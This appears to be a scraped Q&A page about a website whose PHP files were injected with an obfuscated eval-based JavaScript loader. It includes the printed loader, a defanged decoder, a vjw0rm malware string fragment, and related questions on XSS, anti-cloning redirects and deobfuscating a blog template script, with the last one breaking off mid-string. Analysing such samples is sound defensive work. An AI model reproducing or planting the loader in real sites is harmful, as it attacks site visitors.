All my index.php files on my website got hacked - javascript

All index.php files on my website got hacked with the code injection in the body tag, see below. Does anyone know how they did it, whether there is a way to look for it, and how to prevent it?
echo "<body><script language="javascript">try { function BwrLMVnkPmRbZYpfwLH(MLJOynjaY){var iMgpLZHO="",aVwbJg,oKONbIZB,gdGJUWTs,siAOty,hPaiwMZ,NxynbqCA,VxXqcPIGHh,UclXTRxDsh,bRLAlhars;var nGBCFoc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var OZymdhDIRb="";for(UclXTRxDsh=0;UclXTRxDsh<MLJOynjaY.length;){siAOty=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));hPaiwMZ=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));bRLAlhars=BwrLMVnkPmRbZYpfwLH;NxynbqCA=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));VxXqcPIGHh=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));aVwbJg=(siAOty<<2)+(hPaiwMZ>>4);oKONbIZB=((hPaiwMZ&15)<<4)+(NxynbqCA>>2);gdGJUWTs=((NxynbqCA&3)<<6)+VxXqcPIGHh;bRLAlhars=bRLAlhars.toString();iMgpLZHO+=String.fromCharCode(aVwbJg);if(NxynbqCA!=64)iMgpLZHO+=String.fromCharCode(oKONbIZB);if(VxXqcPIGHh!=64)iMgpLZHO+=String.fromCharCode(gdGJUWTs);}bRLAlhars=bRLAlhars.replace(/\W/g,"");bRLAlhars=bRLAlhars.split("").reverse().join("");for(UclXTRxDsh=0;UclXTRxDsh<iMgpLZHO.length;UclXTRxDsh++)OZymdhDIRb+=String.fromCharCode(iMgpLZHO.charCodeAt(UclXTRxDsh%iMgpLZHO.length)^bRLAlhars.charCodeAt(UclXTRxDsh%bRLAlhars.length));return eval(OZymdhDIRb);}BwrLMVnkPmRbZYpfwLH("QnJpZEhETVl6b0xBVmxnBBQGRRsOBgYDAExOUgUHDzQhNwwcXScKNzUsCSY5ESwAChtrUAgOERIfBEpFekZbawESFQ8ICWE/MygED21USFF1WmleUWUKMwYgCAFBKxcIDws7aGdsUlZvUm9tZioUEwkuCEEBFAROVFJWOxYmOX5HSxVULyEBEGobPTl3BQ17CxMOUVdOdEJTRRQILhwFFioMfDY3CBp7URgDIRY2FzAFDzFaBgAcCAIPTEg=");} catch(e){}</script>";

I would suggest you use HTML Purifier.

HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant.

Also, use the mysql_real_escape_string function on any values you want to insert/update into the database, and use intval on the numbers to minimize the risk.

The javascript decodes and evals the following binary string:
0000: 2935 3f1e 1070 7a63 286e 6d69 626b 742b )5?..pzc(nmibkt+
0010: 2037 6974 7d55 495b 4d50 0f45 6244 7154 7it}UI[MP.EbDqT
0020: 5b72 617d 4f55 7e5a 0e34 674d 6373 7767 [ra}OU~Z.4gMcswg
0030: 3937 1b2e 372a 4d40 7767 7c6e 0f5a 5f67 97..7*M#wg|n.Z_g
0040: 4c55 2124 2f1c 1c32 1a1a 2937 5e6b 6a43 LU!$/..2..)7^kjC
0050: 5d75 efbf bd4e 7367 4c79 5aef bfbd 0423 ]u...NsgLyZ....#
0060: 1a0c 2322 0820 0f4f 707c 4a5c 6929 4279 ..#". .Op|J\i)By
0070: 6b26 6c74 3b32 3538 5264 526a 1c15 0251 k<258RdRj...Q
0080: 3c6b 6c78 6a25 736e 7d0f 7779 2367 705b <klxj%sn}.wy#gp[
0090: 3923 291a 273f 205c 7262 6c62 5b63 640f 9#).'? \rblb[cd.
00a0: 726f 7a6e 233d 227b 5611 7e45 5348 575b rozn#="{V.~ESHW[
00b0: 6936 6555 6e67 6461 2527 223e 3c2f 6b6c i6eUngda%'"></kl
00c0: 786a 2573 6e7d 0f77 7923 6770 5b39 2329 xj%sn}.wy#gp[9#)
00d0: 1a27 3f3e .'?>
which seems a bit pointless as most javascript engines should just throw a syntax error. Perhaps it causes an overflow in some browser.
As to how they actually did it: the code you posted is exploiting a client-side bug, and they probably compromised your server with an unrelated attack. It will depend on how your content is generated, but an SQL injection or a filesystem overwrite is possible. Do you do anything like eval unescaped SQL or run dynamic exec-family functions from PHP?
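The decoding stage that the answer above ran can be reproduced without ever calling eval, which is the safe way to look at what an injected loader of this shape would have executed. The following is an added example, not code from the question or the answer: it re-implements the three steps of the loader (a hand-rolled base64 decode, an XOR key derived from the loader's own source text with non-word characters stripped and reversed, and a repeating-key XOR) but returns the result as text instead of evaluating it. The loader source, payload and round-trip encoder at the bottom are constructed for the demonstration; the real loader's key is its own function body, which is why reformatting or renaming anything inside it changes the key and yields the garbage seen in the hex dump.

```javascript
// Added example, not part of the original post: defanged re-implementation of the
// injected loader's decoding stage. It never calls eval(); it returns the decoded text.
const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Base64 decode with the loader's own rules: '=' maps to index 64 and ends a group early.
function loaderBase64Decode(s) {
  let out = "";
  for (let i = 0; i < s.length; ) {
    const a = B64.indexOf(s.charAt(i++));
    const b = B64.indexOf(s.charAt(i++));
    const c = B64.indexOf(s.charAt(i++));
    const d = B64.indexOf(s.charAt(i++));
    out += String.fromCharCode((a << 2) + (b >> 4));
    if (c !== 64) out += String.fromCharCode(((b & 15) << 4) + (c >> 2));
    if (d !== 64) out += String.fromCharCode(((c & 3) << 6) + d);
  }
  return out;
}

// The XOR key: the loader's source text with every non-word character removed, reversed.
// (The real loader gets its source via Function.prototype.toString on itself.)
function deriveKey(loaderSource) {
  return loaderSource.replace(/\W/g, "").split("").reverse().join("");
}

// Repeating-key XOR over character codes (the loader's second loop).
function xorWithKey(data, key) {
  let out = "";
  for (let i = 0; i < data.length; i++) {
    out += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Defanged equivalent of the loader: the text it would have handed to eval().
function decodeLoaderPayload(b64, loaderSource) {
  return xorWithKey(loaderBase64Decode(b64), deriveKey(loaderSource));
}

// --- Below this line: constructed round-trip sample only, not part of the loader. ---
function base64Encode(s) {
  let out = "";
  for (let i = 0; i < s.length; i += 3) {
    const n = s.length - i;
    const b0 = s.charCodeAt(i);
    const b1 = n > 1 ? s.charCodeAt(i + 1) : 0;
    const b2 = n > 2 ? s.charCodeAt(i + 2) : 0;
    out += B64[b0 >> 2] + B64[((b0 & 3) << 4) | (b1 >> 4)]
      + (n > 1 ? B64[((b1 & 15) << 2) | (b2 >> 6)] : "=")
      + (n > 2 ? B64[b2 & 63] : "=");
  }
  return out;
}

// Constructed stand-in for a loader's source text and a harmless constructed payload.
const SAMPLE_LOADER_SOURCE = "function loader(data){ /* constructed stand-in */ return decode(data); }";
const SAMPLE_PAYLOAD = "console.log('decoded without eval')";

function encodeLikeLoader(plaintext, loaderSource) {
  return base64Encode(xorWithKey(plaintext, deriveKey(loaderSource)));
}

function demo() {
  const packed = encodeLikeLoader(SAMPLE_PAYLOAD, SAMPLE_LOADER_SOURCE);
  return {
    withOriginalKey: decodeLoaderPayload(packed, SAMPLE_LOADER_SOURCE),
    // Same bytes, but the key derived from a "beautified" copy of the loader differs: garbage out.
    withModifiedKey: decodeLoaderPayload(packed, SAMPLE_LOADER_SOURCE + " // reformatted"),
  };
}
```

Run `demo()` under Node: the first field is the payload, the second is unreadable, which is the self-check the loader relies on. When analysing a real sample, feed `decodeLoaderPayload` the base64 argument and the loader's function text exactly as it appears in the infected file.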

Related

Currently analysing a sample of the vjw0rm js malware but I don't know how to find the hidden ioc

So for the last couple of days I have been practicing some basic malware analysis, mainly on macro malware like Agent Tesla, but this time I am trying to figure out how to solve the logic of the vjw0rm JavaScript malware, and so far I have managed to deobfuscate the code using a combination of manual deobfuscation and an online tool.
This is the sample in its deobfuscated form: https://pastebin.com/qRBKix6V
I am not able to post the entire thing here on Stack Overflow, so I posted it on pastebin because it's just too large for the post limit of 30000 characters. I will post a snippet of the code instead; it's the piece of the code I am struggling to wrap my head around, where it looks to be base64,
and I did try converting it into text using a base64-to-text online tool, and I was promptly told that this was actually code and that I should convert it to the bin format. I could read the output before I downloaded it, and it was just a bunch of random letters with no meaning at all.
What does this mean?
function t() {
var Nd = ["W68xWPnGW59PWQiEnaC", "yMeBqSoNWPxdO8kT", "omkdW6ddQq", "q2XVC2u", "W7/dPCkWWPpdNfldVG", "WOHnWONcTtXLWPH+WQPb", "sSkzfq", "A3LWzsaVDhiGiG", "vbVdSSk7WOK", "Evz3tuK", "fSoHxmk9C1ldPq", "WOtcLSozW6S", "W7ebWPBcRaCxW5BcJrn0", "Ahr0CdOVl2DYyq", "atP8ssW", "gL3cMG", "C3bSAxq", "u2XLzxa", "B3bLBG", "tfNdJGddR8oFqSkHW7u", "W4RdPCo4aN/cIw9Ifmk4WPv1", "Dg9tDhjPBMC", "BsS0ga", "rhhcT3lcKXpcT8keW4tdMG", "jvjNtMuL", "WRpcTCoyW6/cQq", "mhWZFdr8mxWY", "ue9tva", "W5SibaddMmkMumo4", "mZmWt3Lsrvfe", "FY3dPHZcOcdcJ8kSWQJdQa", "lrJcQ8oRWQFdGSoaWPW6W4y", "aCo/fvxdJMuaD8oyW6C", "W5nKW68+ntGvEConeZ0", "W4pcJSkO", "Dub7or8", "hGnwAbvOcSo6W79/", "BgVcGwJcLG", "uMvNv3jPDgu", "xhjVB3rCC2vJDq", "W6LEA19k", "W4TgW6VdR3i", "WOTqgrldVmkDEmo4", "W7FcVSk1CmoBpW", "BuDAtKS", "WPNcNhqRWQ0", "t8kAztlcQmkrhW", "W5tdLahdNCoEW7KYmSkacW", "fSo0W4xcMN0XW5TDi2S", "tCoEWRJcVutcP2SJn8oMWQi", "twLJCM9ZB2z0xa", "WO9uwKZcHmk0CSoniSkIW5W", "WRZdJGtdI8od", "ef/dM8kau8olW6jFn8k6", "yxbWBhK", "jxZcVSkgWPe", "F8oPvW", "mJy0vhv2vgXi", "WRtdVMm1", "qCk4m8kNAM3dSHRdIq", "F2RcQG", "pCo5W6e7oaysu8oX", "hCodowFdS8osqSo5y8kogKFdVq", "WRyAkmk0kHuHFwS", "nxW0FdH8mW", "shHSz1O", "sXpdUmkUWO3dNCo7k8oWza", "WRiwj8kRlHa", "yMvRBKC", "AxrLBq", "WRJdH8ouWQRdKa", "u2HLBgWUqxbWBa", "W6PdW50", "W53dOCk0WPC", "oCk5xwJcSq", "atapCSoCWQxdMSk6", "zLDLuhG", "juVdHCoXW67cJxZdVSkLW4y", "ntG1odD2qKrRzNG", "ntuWmtK1DxjtC2nx", "we1msfruua", "ruPUEhu", "BG9MW58qWPJcPfddK8kt", "W7KibqBdKa", "jGVcQSk0W5JdLmkUi8kR", "W6nfA11+", "uxvPDa", "d8kDEvxcKa", "renDcdS", "W5/dVc7dVmo0", "WR5keSkhW7jdyCkca8o0sq0d", "WOVcVCkaDGS", "jedcRmo+W5NcNSoXoCoVCmkVWP8", "Bw92zu5LEhq", "wefJW5mcWP/cQeZdGSoy", "Ffz8", "EujSyvi", "yxrPBMDtExn0zq", "zgVcOwS", "h2hcOCkxWRRdOmkwqW", "DuPcfZ/cP3y", "rJ0XdLO", "CSonCJy+", "jJitWOhdHcldS8opbmkp", "rMLSzq", "ChnHBg1Zltu1", "betdKmkftSoC", "W6ZdTmkfWPhdMq", "uhjVz3jHBurHDa", "mNWWFdf8n3W2Fa", "FwPxW4BcMW", "v2LUzg93C1XdDq", "WPqHWRe", "xe1Py3jVC29MDa", "vxL4Cu0", "rgLZCgXHEu5HBq", "wuvt", "WQtcH8kLWPbpydzfWPRcVa", 
"W7vcW6BdQ3a", "u2nODgfZA3mGlW", "sw5ZDgfUy2vZtW", "odCZsgXrs2Do", "qSk+mvdcUa", "yxrfBMq", "vwDoC1u", "W7HfW5KHW6KFW6u", "zwXS", "z8kNcNTsWR3dKSoJWRFcVG", "u0XbD2O", "CMvWBgfJzq", "W6LiW4VcRXvNW47cJfro", "W4rrW7C", "yuXutgq", "v1nJCMLWDc5tAa", "W6ddVW7dJSoJ", "r1DNs2K", "wgDZtwq", "t3bLBLrLEhrgAq", "t3rYweK", "W5tdRSkoWRJdNa", "xfnVzNr3yxjLxa", "tqpcPt3cRZjFWP3dHH0", "zmkafgVcRSk1W6vYrmkn", "fmoGDSkksfNdGqK", "WONcU8k4WPbU", "qLFdR8k9uG", "qmoqwX8CW7bgzq", "Emo4W4hcKvS1W58EAq", "seTmtvXtt0zuvW", "uKvhx1nA", "CML0EwnLBNrLCG", "DCkclIO", "DgvTCa", "lK5fvfXgCMfTzq", "nKD6B3fbra", "BgXUvLa", "g2/dQSor", "mZq0mtjzv0rHwuG", "oCkNvf7cSsn5tu5t", "y29Kzeu", "udDfs09xqJzhsa", "rmo2W6xcTKK", "v3jPDgu"];
This is the malware sample in its obfuscated form: https://pastebin.com/xukFtPT7
My main goal here is to get an understanding of how the code functions and how it eventually gets to the IOCs like IP addresses and domain names.
So far I have done some research around this malware, but I found very little regarding how to reverse engineer it, and the only resource I found did not have the same code as mine.
I am by no means an expert at reverse engineering malware, and I am not a master programmer by any means, but I am able to read and write basic programs.
But on the other hand, I have watched many tutorials and read many resources regarding malware from different families and how best to analyse them using a combination of tools and manual malware analysis, both static and dynamic.
What should I do now?

How to fix Veracode - Cross site scripting - CWE ID 80 - Basic XSS - use of $(item) in .each function

So, when our web application is scanned by Veracode, I get many Cross-Site Scripting flaws:
"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)" (CWE ID 80).
And, out of the few flaws we have, I could not figure out how to fix this particular scenario.
Below is my piece of code -
$(".ui-dialog-buttonset .ui-button:visible").each(function(index, item) {
var label = $(item).text();
if (label == "Save" || label == "Create")
$(item).click();
});
I can see the flaw reported on the $(item).text(); and $(item).click(); lines.
I understand that, for text, I can use something like DOMPurify.sanitize to clean the string.
But I could not understand why Veracode is reporting $(item).click();
Is it because $(item) itself is not safe?
If yes, then how do I fix it?
I would greatly appreciate any help in this.
Okay, found the fix in the DOMPurify library.
You can sanitize a DOM element too using DOMPurify.
So, the code below works -
item = DOMPurify.sanitize(item, {SAFE_FOR_JQUERY:true});
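To understand why a scanner treats $(item) as a sink, it helps to see the rule jQuery itself applies to its argument: a string that looks like markup is parsed as HTML, a DOM node never is. The following is an added example, not code from the question, the answer, Veracode or jQuery; the classifier mirrors the checks in jQuery's init() (its rquickExpr regex and the "<...>" shortcut) so you can test which inputs reach the HTML-parsing path, and the second function is a form of the button loop that only ever hands DOM nodes to the library and compares the label as text against a fixed allow-list. The sample buttons are constructed stand-ins for DOM nodes so the code runs under Node.

```javascript
// Added example, not from the question or the answer. Mirrors jQuery's decision rule for
// $(arg): which argument shapes get parsed as HTML (the XSS sink a scanner is modelling).
const rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;

function classifyJQueryArgument(arg) {
  if (arg === null || arg === undefined || arg === "") return "empty";
  if (typeof arg === "object" && typeof arg.nodeType === "number") return "node"; // never parsed
  if (typeof arg === "function") return "ready-callback";
  if (typeof arg !== "string") return "other";
  let match;
  if (arg[0] === "<" && arg[arg.length - 1] === ">" && arg.length >= 3) {
    match = [null, arg, null]; // "<...>" shortcut: treated as HTML without consulting the regex
  } else {
    match = rquickExpr.exec(arg);
  }
  if (match && match[1]) return "html";        // parsed as markup: a sink if attacker-influenced
  if (match && match[2]) return "id-selector";
  return "selector";
}

// Hardened loop body: input is a list of DOM nodes (from querySelectorAll or a jQuery .each),
// the label is read as text (data, never markup), and a fixed allow-list decides what is clicked.
const AUTO_CLICK_LABELS = new Set(["Save", "Create"]);

function buttonsToClick(buttons) {
  return Array.from(buttons).filter(
    (b) => b && typeof b.nodeType === "number" && AUTO_CLICK_LABELS.has(String(b.textContent).trim())
  );
}

// Constructed stand-ins for DOM nodes so the functions can be exercised outside a browser.
const SAMPLE_BUTTONS = [
  { nodeType: 1, textContent: " Save " },
  { nodeType: 1, textContent: "Cancel" },
  { nodeType: 1, textContent: "<b>Save</b>" }, // textContent is plain text, so this is just an odd label
];
```

In a browser the selected buttons are real elements, so `buttonsToClick(document.querySelectorAll(".ui-dialog-buttonset .ui-button"))` followed by `.forEach((b) => b.click())` does the same job as the original loop without any call that a string could reach; the finding becomes actionable only where `item` can be a string from outside the page.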

How to use JavaScript or/and PHP, to detect a website/page being stolen/cloned and then redirect reader back to my website

I found hundreds of cloned versions of my website.
Whoever is doing that is using some code that clones my web pages and changes my website name mydomain.com to clone1.com, clone2.com, clone3.com etc., and this makes it impossible to use simple JS or PHP to check whether the header URL is equal to mysite.com and then redirect.
It also does not work using .htaccess.
For this reason I have created this code:
<script type="text/javascript">
if (window.location.href== "http://clone1.com/cat1/{{{ $title->id }}}-{{ (Str::slug($title->title)) }}/cat2/{{ $se->n }}/cat3/{{ $episode->ep_n }}")
{
window.location.href = 'http://google.com/';
}
</script>
This script fulfils its purpose but is too long and is also very restrictive because it must contain the exact URL.
I'm looking to do this:
<script type="text/javascript">
if (window.location.href== "http://
//contains this part in its URL
clone1.com , clone2.com , clone3.com , clone4....
}}")
{
window.location.href = 'http://google.com/';
}
</script>
How can I create a global JS (JavaScript), that would detect if the current page is not on my domain and then redirect the reader to my domain and the same page?
Many thanks
1. Best Solution - Early Detection
Depending on your main traffic source, it is possible to detect who is scraping you and block them based on their IP, headers, number of page views and other data, using PHP & HTACCESS.
I really like this answer on StackOverflow, which discusses almost all the options available for early detection.
How to detect fake users ( crawlers ) and cURL
2. Plugins & Extensions for Open Source Content Management Systems
Wordpress
If using the Wordpress CMS, you can try some plugins, like WordFence, that can detect and block fake Google crawlers, block based on the number of page views, etc.
Other CMS
If you can't find a similar solution for your CMS of choice, consider asking its community for help with creating a solution like that, as I believe many people could benefit from it.
3. Solution for already stolen content with JavaScript
Sometimes the easiest road to hide something in JS is to actually HIDE it by OBFUSCATING it and spreading it across multiple important files. For example, obfuscate some important file on your website without which the website just wouldn't work properly.
For example, put an obfuscated version of the code below somewhere in a JS file in the header. Obfuscate this code using any free service online or download your own library from GitHub:
Non-Obfuscated:
var w = 'mysite.com'; // Hostname of the legitimate site, compared against window.location.hostname
function check_origin(){
    var check = 587;
    if(window.location.hostname != w){
        // A bare 'mysite.com' would be resolved as a relative path on the clone; use an absolute URL
        window.location.href = 'https://' + w;
    }
    return check;
}
var check = check_origin();
Obfuscated example:
var _0x303e=["\x6D\x79\x73\x69\x74\x65\x2E\x63\x6F\x6D","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F"];w= _0x303e[0];function check_origin(){var check=587;if(window[_0x303e[2]][_0x303e[1]]!= w){window[_0x303e[2]][_0x303e[3]]= _0x303e[4]+w};return check}var check=check_origin()
Now put additional code in some footer JS file to verify that the code above wasn't modified in any way:
Non-Obfuscated example:
if(w !== 'mysite.com' || check == false || typeof check == 'undefined' || check !== 587 ){
    window.location.href = 'https://mysite.com';
}
Obfuscated:
var _0x92bb=["\x6D\x79\x73\x69\x74\x65\x2E\x63\x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F"];if(w!== _0x92bb[0]|| check== false|| typeof check== _0x92bb[1]|| check!== 587){window[_0x92bb[3]][_0x92bb[2]]= _0x92bb[4]+_0x92bb[0]}
I have used a free online service from Google's search results for the term "Free Online JS Obfuscator":
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
4. Fight thieves with available methods e.g. Request a Ban from Search Engines – The Digital Millennium Copyright Act of 1998
Here is a blog-post that describes what to do when someone is stealing your content.
https://lorelle.wordpress.com/2006/04/10/what-do-you-do-when-someone-steals-your-content/
You can investigate who is doing that and report them to their partners, search engines, advertisers - to disrupt their business.
Depending on their country of origin and yours, it is maybe even possible to sue them and win.
Why not check if the hostname is yours?
if(window.location.hostname != 'mysite.com'){
window.location.href = 'http://google.com/';
}
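Both answers compare the hostname, but the question also asks to land the reader on the same page of the real site rather than on a search engine. The following is an added example, not code from either answer: it does an exact hostname comparison against an allow-list (so `mysite.com.clone3.com` does not pass, which a substring check would allow) and rebuilds the current path, query string and fragment on the canonical origin using the WHATWG URL API available in browsers and Node. The canonical origin and the allowed host names are assumptions for the demonstration.

```javascript
// Added example, not from the answers above. Assumed values: the canonical origin and the
// hosts the page is legitimately served from.
const CANONICAL_ORIGIN = "https://mysite.com";
const ALLOWED_HOSTS = new Set(["mysite.com", "www.mysite.com", "localhost"]);

// Returns null when the page is served from an allowed host, otherwise the same page on
// the canonical origin. Exact hostname match: "mysite.com.clone3.com" is not allowed.
function canonicalRedirectTarget(currentHref) {
  const current = new URL(currentHref); // throws on malformed input, which is what we want
  if (ALLOWED_HOSTS.has(current.hostname.toLowerCase())) return null;
  const target = new URL(current.pathname + current.search + current.hash, CANONICAL_ORIGIN);
  return target.href;
}

// Browser entry point; skipped under Node, where there is no window object.
// location.replace() keeps the clone out of the visitor's history.
if (typeof window !== "undefined") {
  const target = canonicalRedirectTarget(window.location.href);
  if (target) window.location.replace(target);
}
```

As the accepted answer notes, a cloner that rewrites your domain name inside scripts defeats any check that carries the hostname as a plain string, so in practice the constant above is what you would split or obfuscate, and the check still belongs alongside server-side blocking rather than instead of it.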

How can I decode this obfuscated javascript?

I am in the process of setting up a blog through blogger.com and used a template from veethemes.com to get me started.
However, I noticed that there's an obfuscated script in the template and I'd prefer to know what it does to ensure that nothing untowards or unwanted is being done.
The code is as follows:
var _0x378a=["\x6B\x20\x45\x28\x73\x2C\x6E\x29\x7B\x79\x20\x73\x2E\x77\x28\x2F\x3C\x5C\x2F\x3F\x28\x3F\x21\x53\x5C\x73\x2A\x5C\x2F\x3F\x29\x5B\x61\x2D\x7A\x5D\x5B\x61\x2D\x54\x2D\x39\x5D\x2A\x5B\x5E\x3C\x3E\x5D\x2A\x3E\x2F\x4C\x2C\x22\x22\x29\x2E\x4B\x28\x2F\x5C\x73\x2B\x2F\x29\x2E\x31\x37\x28\x30\x2C\x6E\x2D\x31\x29\x2E\x5A\x28\x27\x20\x27\x29\x7D\x6B\x20\x31\x31\x28\x65\x2C\x74\x2C\x6E\x2C\x68\x2C\x63\x2C\x62\x2C\x71\x29\x7B\x35\x20\x72\x3D\x6A\x2E\x66\x28\x65\x29\x3B\x35\x20\x69\x3D\x6A\x2E\x66\x28\x6E\x29\x3B\x35\x20\x63\x3D\x63\x3B\x35\x20\x62\x3D\x62\x3B\x35\x20\x73\x3D\x22\x22\x3B\x35\x20\x6F\x3D\x72\x2E\x31\x39\x28\x22\x41\x22\x29\x3B\x35\x20\x61\x3D\x58\x3B\x35\x20\x70\x3D\x22\x22\x3B\x35\x20\x31\x36\x3D\x22\x75\x2E\x4D\x28\x57\x2E\x38\x2C\x20\x27\x31\x30\x27\x2C\x20\x27\x31\x32\x3D\x59\x2C\x20\x31\x33\x3D\x31\x34\x2C\x20\x31\x38\x3D\x78\x2C\x20\x31\x35\x3D\x78\x2C\x20\x4F\x2C\x20\x4E\x27\x29\x3B\x20\x79\x20\x50\x3B\x22\x3B\x49\x28\x6F\x2E\x51\x3E\x3D\x31\x29\x7B\x73\x3D\x27\x3C\x33\x20\x36\x3D\x22\x56\x2D\x55\x22\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x22\x3E\x3C\x41\x20\x36\x3D\x22\x52\x22\x20\x76\x3D\x22\x27\x2B\x6F\x5B\x30\x5D\x2E\x76\x2E\x77\x28\x2F\x73\x5C\x42\x5C\x64\x7B\x32\x2C\x34\x7D\x2F\x2C\x27\x73\x27\x2B\x31\x6F\x29\x2B\x27\x22\x20\x31\x71\x3D\x22\x22\x2F\x3E\x3C\x2F\x61\x3E\x3C\x2F\x33\x3E\x27\x3B\x61\x3D\x31\x73\x7D\x35\x20\x67\x3D\x27\x3C\x33\x20\x36\x3D\x22\x31\x72\x22\x3E\x3C\x33\x20\x36\x3D\x22\x31\x74\x22\x3E\x3C\x33\x20\x36\x3D\x22\x43\x22\x3E\x3C\x37\x20\x36\x3D\x22\x31\x61\x22\x3E\x27\x2B\x62\x2B\x27\x3C\x2F\x37\x3E\x3C\x37\x20\x36\x3D\x22\x31\x70\x22\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x23\x31\x6D\x22\x3E\x27\x2B\x63\x2B\x27\x3C\x2F\x61\x3E\x3C\x2F\x37\x3E\x3C\x2F\x33\x3E\x3C\x44\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x22\x3E\x27\x2B\x6E\x2B\x27\x3C\x2F\x61\x3E\x3C\x2F\x44\x3E\x3C\x33\x20\x36\x3D\x22\x43\x20\x31\x66\x22\x3E\x3C\x37\x20\x36\x3D\x22\x71\x22\x3E\x31\x65\x20\x31\x6E\x20\x27\x2B\x71\x2B\x27\x3C\x2F\x37\x3E\x3C\x37\x20\x36\x3D\x22\x68\x22\x3E\x31\x64\x20\x27\x2B\x68\x2B\x27\x3C\x2F\x37\x3E\x3C\x2F\x33\x3E\x3C\x2F\x33\x3E\x27\x2B\x73\x2B\x27\x3C\x33\x20\x36\x3D\x22\x31\x62\x22\x3E\x3C\x70\x3E\x27\x2B\x45\x28\x72\x2E\x6D\x2C\x61\x29\x2B\x27\x20\x5B\x2E\x2E\x2E\x2E\x2E\x5D\x3C\x2F\x70\x3E\x3C\x2F\x33\x3E\x3C\x2F\x33\x3E\x27\x3B\x72\x2E\x6D\x3D\x67\x7D\x3B\x75\x2E\x31\x63\x3D\x6B\x28\x29\x7B\x35\x20\x65\x3D\x6A\x2E\x66\x28\x22\x31\x67\x22\x29\x3B\x49\x28\x65\x3D\x3D\x31\x68\x29\x7B\x75\x2E\x31\x6C\x2E\x38\x3D\x22\x4A\x3A\x2F\x2F\x46\x2E\x47\x2E\x6C\x22\x7D\x65\x2E\x48\x28\x22\x38\x22\x2C\x22\x4A\x3A\x2F\x2F\x46\x2E\x47\x2E\x6C\x2F\x22\x29\x3B\x65\x2E\x48\x28\x22\x31\x6B\x22\x2C\x22\x31\x6A\x22\x29\x3B\x65\x2E\x6D\x3D\x22\x31\x69\x2E\x6C\x22\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x64\x69\x76\x7C\x7C\x76\x61\x72\x7C\x63\x6C\x61\x73\x73\x7C\x73\x70\x61\x6E\x7C\x68\x72\x65\x66\x7C\x7C\x7C\x74\x61\x67\x7C\x63\x6F\x6D\x6D\x65\x6E\x74\x7C\x7C\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x7C\x64\x61\x74\x65\x7C\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x63\x6F\x6D\x7C\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C\x7C\x7C\x7C\x7C\x61\x75\x74\x68\x6F\x72\x7C\x7C\x7C\x7C\x77\x69\x6E\x64\x6F\x77\x7C\x73\x72\x63\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x32\x34\x7C\x72\x65\x74\x75\x72\x6E\x7C\x7C\x69\x6D\x67\x7C\x7C\x6D\x65\x74\x61\x7C\x68\x32\x7C\x73\x74\x72\x69\x70\x54\x61\x67\x73\x7C\x77\x77\x77\x7C\x76\x65\x65\x74\x68\x65\x6D\x65\x73\x7C\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x7C\x69\x66\x7C\x68\x74\x74\x70\x7C\x73\x70\x6C\x69\x74\x7C\x69\x67\x7C\x6F\x70\x65\x6E\x7C\x72\x65\x73\x69\x7A\x61\x62\x6C\x65\x7C\x73\x63\x72\x6F\x6C\x6C\x62\x61\x72\x73\x7C\x66\x61\x6C\x73\x65\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x69\x6D\x67\x7C\x62\x72\x7C\x7A\x30\x7C\x6D\x65\x64\x69\x61\x7C\x70\x6F\x73\x74\x7C\x74\x68\x69\x73\x7C\x73\x75\x6D\x6D\x61\x72\x79\x5F\x6E\x6F\x69\x6D\x67\x7C\x35\x35\x30\x7C\x6A\x6F\x69\x6E\x7C\x77\x69\x6E\x64\x6F\x77\x4E\x61\x6D\x65\x7C\x72\x6D\x7C\x77\x69\x64\x74\x68\x7C\x68\x65\x69\x67\x68\x74\x7C\x36\x30\x30\x7C\x74\x6F\x70\x7C\x70\x6F\x70\x75\x70\x7C\x73\x6C\x69\x63\x65\x7C\x6C\x65\x66\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x74\x61\x67\x73\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x65\x78\x63\x65\x72\x70\x74\x7C\x6F\x6E\x6C\x6F\x61\x64\x7C\x6F\x6E\x7C\x70\x6F\x73\x74\x65\x64\x7C\x70\x6F\x73\x74\x5F\x6D\x65\x74\x61\x7C\x61\x74\x74\x72\x69\x5F\x62\x75\x74\x69\x6F\x6E\x7C\x6E\x75\x6C\x6C\x7C\x56\x65\x65\x54\x68\x65\x6D\x65\x73\x7C\x64\x6F\x66\x6F\x6C\x6C\x6F\x77\x7C\x72\x65\x6C\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7